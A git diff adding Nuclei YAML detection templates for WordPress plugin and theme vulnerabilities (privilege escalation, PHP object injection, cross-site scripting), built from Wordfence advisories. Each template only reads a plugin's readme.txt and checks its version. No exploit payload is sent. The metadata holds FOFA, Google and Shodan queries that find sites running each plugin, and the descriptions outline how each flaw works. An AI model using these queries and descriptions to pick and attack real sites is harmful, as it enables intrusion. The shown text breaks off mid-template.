./poc/wordpress/wptf-image-gallery-fcb84176c85e1d348e75f01cbfe51bdb.yaml
./poc/wordpress/wptf-image-gallery.yaml
./poc/wordpress/wptools-1d6961a309e74315b43f9b84a7612ac8.yaml
diff --git a/poc/auth/login-as-users-0e39f1f2ee0d17c654853b5f04aceb5b.yaml b/poc/auth/login-as-users-0e39f1f2ee0d17c654853b5f04aceb5b.yaml
new file mode 100644
index 0000000000..b3e4f61557
--- /dev/null
+++ b/poc/auth/login-as-users-0e39f1f2ee0d17c654853b5f04aceb5b.yaml
@@ -0,0 +1,59 @@
+id: login-as-users-0e39f1f2ee0d17c654853b5f04aceb5b
+
+info:
+ name: >
+ Login As Users <= 1.4.2 - Authentication Bypass
+ author: topscoder
+ severity: critical
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/73a0d7a9-374b-430d-a7e5-3c7cdaff5785?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/login-as-users/"
+ google-query: inurl:"/wp-content/plugins/login-as-users/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,login-as-users,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/login-as-users/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "login-as-users"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.4.2')
\ No newline at end of file
diff --git a/poc/auth/mycred-0ba5901497b34cfef40a203e86fad82f.yaml b/poc/auth/mycred-0ba5901497b34cfef40a203e86fad82f.yaml
new file mode 100644
index 0000000000..4d897f9d17
--- /dev/null
+++ b/poc/auth/mycred-0ba5901497b34cfef40a203e86fad82f.yaml
@@ -0,0 +1,59 @@
+id: mycred-0ba5901497b34cfef40a203e86fad82f
+
+info:
+ name: >
+ myCred <= 2.7.2 - Unauthenticated PHP Object Injection
+ author: topscoder
+ severity: critical
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/44ea3322-10f6-4f52-8fa8-8cc2632b67ce?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/mycred/"
+ google-query: inurl:"/wp-content/plugins/mycred/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,mycred,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/mycred/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "mycred"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.7.2')
\ No newline at end of file
diff --git a/poc/auth/mycred-5b86df80efa6b07ad02aa927c0bbfb50.yaml b/poc/auth/mycred-5b86df80efa6b07ad02aa927c0bbfb50.yaml
new file mode 100644
index 0000000000..ac703a52c3
--- /dev/null
+++ b/poc/auth/mycred-5b86df80efa6b07ad02aa927c0bbfb50.yaml
@@ -0,0 +1,59 @@
+id: mycred-5b86df80efa6b07ad02aa927c0bbfb50
+
+info:
+ name: >
+ myCred <= 2.7.2 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/69695e2e-2086-4d50-8518-0b2f5ab9ea56?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/mycred/"
+ google-query: inurl:"/wp-content/plugins/mycred/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,mycred,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/mycred/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "mycred"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.7.2')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-28000.yaml b/poc/cve/CVE-2024-28000.yaml
new file mode 100644
index 0000000000..32b0603213
--- /dev/null
+++ b/poc/cve/CVE-2024-28000.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-28000
+
+info:
+ name: >
+ LiteSpeed Cache <= 6.3.0.1 - Unauthenticated Privilege Escalation
+ author: topscoder
+ severity: critical
+ description: >
+ The LiteSpeed Cache plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 6.3.0.1. This is due to the plugin not properly restricting the role simulation functionality allowing a user to set their current ID to that of an administrator, if they have access to a valid hash which can be found in the debug logs or brute forced. This makes it possible for unauthenticated attackers to spoof their user ID to that of an administrator, and then create a new user account with the administrator role utilizing the /wp-json/wp/v2/users REST API endpoint. In some environments, the crawler may be disabled making this a non-exploitable issue in those instances.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/104badec-6e6e-44bb-936b-d135dd80890d?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2024-28000
+ metadata:
+ fofa-query: "wp-content/plugins/litespeed-cache/"
+ google-query: inurl:"/wp-content/plugins/litespeed-cache/"
+ shodan-query: 'vuln:CVE-2024-28000'
+ tags: cve,wordpress,wp-plugin,litespeed-cache,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/litespeed-cache/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "litespeed-cache"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 6.3.0.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-35768-1f25d9ae7e4422f1fede1a610a06c13f.yaml b/poc/cve/CVE-2024-35768-1f25d9ae7e4422f1fede1a610a06c13f.yaml
new file mode 100644
index 0000000000..4ac099b39a
--- /dev/null
+++ b/poc/cve/CVE-2024-35768-1f25d9ae7e4422f1fede1a610a06c13f.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-35768-1f25d9ae7e4422f1fede1a610a06c13f
+
+info:
+ name: >
+ Page Builder: Live Composer <= 1.5.47 - Authenticated (Author+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Page Builder: Live Composer plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.5.47 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/9e661d3c-8acf-48c2-9e54-6913c65a46aa?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-35768
+ metadata:
+ fofa-query: "wp-content/plugins/live-composer-page-builder/"
+ google-query: inurl:"/wp-content/plugins/live-composer-page-builder/"
+ shodan-query: 'vuln:CVE-2024-35768'
+ tags: cve,wordpress,wp-plugin,live-composer-page-builder,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/live-composer-page-builder/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "live-composer-page-builder"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.5.47')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-38675-2521ccef87d99c1d3555b4d5b192db9a.yaml b/poc/cve/CVE-2024-38675-2521ccef87d99c1d3555b4d5b192db9a.yaml
new file mode 100644
index 0000000000..6949c1b300
--- /dev/null
+++ b/poc/cve/CVE-2024-38675-2521ccef87d99c1d3555b4d5b192db9a.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-38675-2521ccef87d99c1d3555b4d5b192db9a
+
+info:
+ name: >
+ Arkhe Blocks <= 2.22.1 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Arkhe Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 2.22.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/1079282d-3183-4190-8a54-d6085d27935a?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-38675
+ metadata:
+ fofa-query: "wp-content/plugins/arkhe-blocks/"
+ google-query: inurl:"/wp-content/plugins/arkhe-blocks/"
+ shodan-query: 'vuln:CVE-2024-38675'
+ tags: cve,wordpress,wp-plugin,arkhe-blocks,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/arkhe-blocks/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "arkhe-blocks"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.22.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-39666-0b1e987c7e40ab204e56556fca06f4e7.yaml b/poc/cve/CVE-2024-39666-0b1e987c7e40ab204e56556fca06f4e7.yaml
new file mode 100644
index 0000000000..7780aab504
--- /dev/null
+++ b/poc/cve/CVE-2024-39666-0b1e987c7e40ab204e56556fca06f4e7.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-39666-0b1e987c7e40ab204e56556fca06f4e7
+
+info:
+ name: >
+ WooCommerce <= 9.1.2 - Authenticated (Administrator+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 9.1.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only impacts multi-site installations and installations where unfiltered_html has been disabled.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/7ad4272c-75a1-4bc9-be3b-add80de45871?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 4.4
+ cve-id: CVE-2024-39666
+ metadata:
+ fofa-query: "wp-content/plugins/woocommerce/"
+ google-query: inurl:"/wp-content/plugins/woocommerce/"
+ shodan-query: 'vuln:CVE-2024-39666'
+ tags: cve,wordpress,wp-plugin,woocommerce,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/woocommerce/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "woocommerce"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 9.1.2')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43213-dcd45d0b65b09157c6e00bd46d98cfce.yaml b/poc/cve/CVE-2024-43213-dcd45d0b65b09157c6e00bd46d98cfce.yaml
new file mode 100644
index 0000000000..920ed4e668
--- /dev/null
+++ b/poc/cve/CVE-2024-43213-dcd45d0b65b09157c6e00bd46d98cfce.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43213-dcd45d0b65b09157c6e00bd46d98cfce
+
+info:
+ name: >
+ WC Marketplace <= 4.1.17 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The WC Marketplace plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in versions up to, and including, 4.1.17 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/c5a263d5-df39-412e-b40a-e06e23168b7e?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-43213
+ metadata:
+ fofa-query: "wp-content/plugins/dc-woocommerce-multi-vendor/"
+ google-query: inurl:"/wp-content/plugins/dc-woocommerce-multi-vendor/"
+ shodan-query: 'vuln:CVE-2024-43213'
+ tags: cve,wordpress,wp-plugin,dc-woocommerce-multi-vendor,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/dc-woocommerce-multi-vendor/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "dc-woocommerce-multi-vendor"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 4.1.17')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43218-a6753f46d4e4972ed286e22be5c0f359.yaml b/poc/cve/CVE-2024-43218-a6753f46d4e4972ed286e22be5c0f359.yaml
new file mode 100644
index 0000000000..b16d26e68d
--- /dev/null
+++ b/poc/cve/CVE-2024-43218-a6753f46d4e4972ed286e22be5c0f359.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43218-a6753f46d4e4972ed286e22be5c0f359
+
+info:
+ name: >
+ Mediavine Control Panel <= 2.10.4 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Mediavine Control Panel plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 2.10.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/d93c9c2d-1216-44e6-bdb8-d419a9ba6c6e?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-43218
+ metadata:
+ fofa-query: "wp-content/plugins/mediavine-control-panel/"
+ google-query: inurl:"/wp-content/plugins/mediavine-control-panel/"
+ shodan-query: 'vuln:CVE-2024-43218'
+ tags: cve,wordpress,wp-plugin,mediavine-control-panel,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/mediavine-control-panel/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "mediavine-control-panel"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.10.4')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43238-1dfbdedd48f79e362612fd3d52464156.yaml b/poc/cve/CVE-2024-43238-1dfbdedd48f79e362612fd3d52464156.yaml
new file mode 100644
index 0000000000..1c6ffce4b2
--- /dev/null
+++ b/poc/cve/CVE-2024-43238-1dfbdedd48f79e362612fd3d52464156.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43238-1dfbdedd48f79e362612fd3d52464156
+
+info:
+ name: >
+ weMail <= 1.14.5 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The weMail plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in versions up to, and including, 1.14.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/82e9bd78-726f-421f-8bf0-560fa9eeab2c?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-43238
+ metadata:
+ fofa-query: "wp-content/plugins/wemail/"
+ google-query: inurl:"/wp-content/plugins/wemail/"
+ shodan-query: 'vuln:CVE-2024-43238'
+ tags: cve,wordpress,wp-plugin,wemail,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wemail/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wemail"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.14.5')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43239-5acc6b9bdc039d71efd1b6883dc7079d.yaml b/poc/cve/CVE-2024-43239-5acc6b9bdc039d71efd1b6883dc7079d.yaml
new file mode 100644
index 0000000000..100b314beb
--- /dev/null
+++ b/poc/cve/CVE-2024-43239-5acc6b9bdc039d71efd1b6883dc7079d.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43239-5acc6b9bdc039d71efd1b6883dc7079d
+
+info:
+ name: >
+ Masteriyo - LMS <= 1.11.4 - Authenticated (Student+) Insecure Direct Object Reference
+ author: topscoder
+ severity: low
+ description: >
+ The Masteriyo LMS – eLearning and Online Course Builder for WordPress plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 1.11.4 due to missing validation on the 'course_id' user controlled key. This makes it possible for authenticated attackers, with student-level access and above, to review courses they don't have access to.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/c3d7a587-042d-4ba1-9373-aaeb24c711f5?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
+ cvss-score: 5.3
+ cve-id: CVE-2024-43239
+ metadata:
+ fofa-query: "wp-content/plugins/learning-management-system/"
+ google-query: inurl:"/wp-content/plugins/learning-management-system/"
+ shodan-query: 'vuln:CVE-2024-43239'
+ tags: cve,wordpress,wp-plugin,learning-management-system,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/learning-management-system/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "learning-management-system"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.11.4')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43240-602dd094f3b3105ea72425933e143ccf.yaml b/poc/cve/CVE-2024-43240-602dd094f3b3105ea72425933e143ccf.yaml
new file mode 100644
index 0000000000..09c60b97d4
--- /dev/null
+++ b/poc/cve/CVE-2024-43240-602dd094f3b3105ea72425933e143ccf.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43240-602dd094f3b3105ea72425933e143ccf
+
+info:
+ name: >
+ Indeed Membership Pro <= 12.6 - Unauthenticated Privilege Escalation
+ author: topscoder
+ severity: critical
+ description: >
+ The Indeed Membership Pro plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 12.6. This is due to the plugin not properly restricting access to functionality that allows privilege assignment. This makes it possible for unauthenticated attackers to gain access to accounts that have higher privileges, such as administrator.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/3bb4a8ba-33f1-4183-be76-72f6a99fc1fa?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2024-43240
+ metadata:
+ fofa-query: "wp-content/plugins/indeed-membership-pro/"
+ google-query: inurl:"/wp-content/plugins/indeed-membership-pro/"
+ shodan-query: 'vuln:CVE-2024-43240'
+ tags: cve,wordpress,wp-plugin,indeed-membership-pro,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/indeed-membership-pro/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "indeed-membership-pro"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 12.6')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43241-808351d5b94024e25294db4171fbaa2f.yaml b/poc/cve/CVE-2024-43241-808351d5b94024e25294db4171fbaa2f.yaml
new file mode 100644
index 0000000000..59b6633220
--- /dev/null
+++ b/poc/cve/CVE-2024-43241-808351d5b94024e25294db4171fbaa2f.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43241-808351d5b94024e25294db4171fbaa2f
+
+info:
+ name: >
+ Indeed Membership Pro <= 12.6 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The Indeed Membership Pro plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in versions up to, and including, 12.6 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/b7dce0db-792f-4be2-a55d-b4fb7442b548?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-43241
+ metadata:
+ fofa-query: "wp-content/plugins/indeed-membership-pro/"
+ google-query: inurl:"/wp-content/plugins/indeed-membership-pro/"
+ shodan-query: 'vuln:CVE-2024-43241'
+ tags: cve,wordpress,wp-plugin,indeed-membership-pro,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/indeed-membership-pro/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "indeed-membership-pro"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 12.6')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43242-4e52d3d71830189e476038c8a70edb3f.yaml b/poc/cve/CVE-2024-43242-4e52d3d71830189e476038c8a70edb3f.yaml
new file mode 100644
index 0000000000..15b2f241bc
--- /dev/null
+++ b/poc/cve/CVE-2024-43242-4e52d3d71830189e476038c8a70edb3f.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43242-4e52d3d71830189e476038c8a70edb3f
+
+info:
+ name: >
+ Indeed Membership Pro <= 12.6 - Unauthenticated PHP Object Injection
+ author: topscoder
+ severity: critical
+ description: >
+ The Indeed Membership Pro plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 12.6 via deserialization of untrusted input. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/12f314c5-ba73-4204-b276-904d9de7c099?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.1
+ cve-id: CVE-2024-43242
+ metadata:
+ fofa-query: "wp-content/plugins/indeed-membership-pro/"
+ google-query: inurl:"/wp-content/plugins/indeed-membership-pro/"
+ shodan-query: 'vuln:CVE-2024-43242'
+ tags: cve,wordpress,wp-plugin,indeed-membership-pro,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/indeed-membership-pro/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "indeed-membership-pro"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 12.6')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43244-939e704d270328b1ff062eb9844d75b2.yaml b/poc/cve/CVE-2024-43244-939e704d270328b1ff062eb9844d75b2.yaml
new file mode 100644
index 0000000000..056961e045
--- /dev/null
+++ b/poc/cve/CVE-2024-43244-939e704d270328b1ff062eb9844d75b2.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43244-939e704d270328b1ff062eb9844d75b2
+
+info:
+ name: >
+ Houzez <= 3.2.4 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The Houzez theme for WordPress is vulnerable to Reflected Cross-Site Scripting in all versions up to, and including, 3.2.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/2ceaa52e-564d-4454-8e3b-dc6899c910dd?source=api-prod
+ classification:
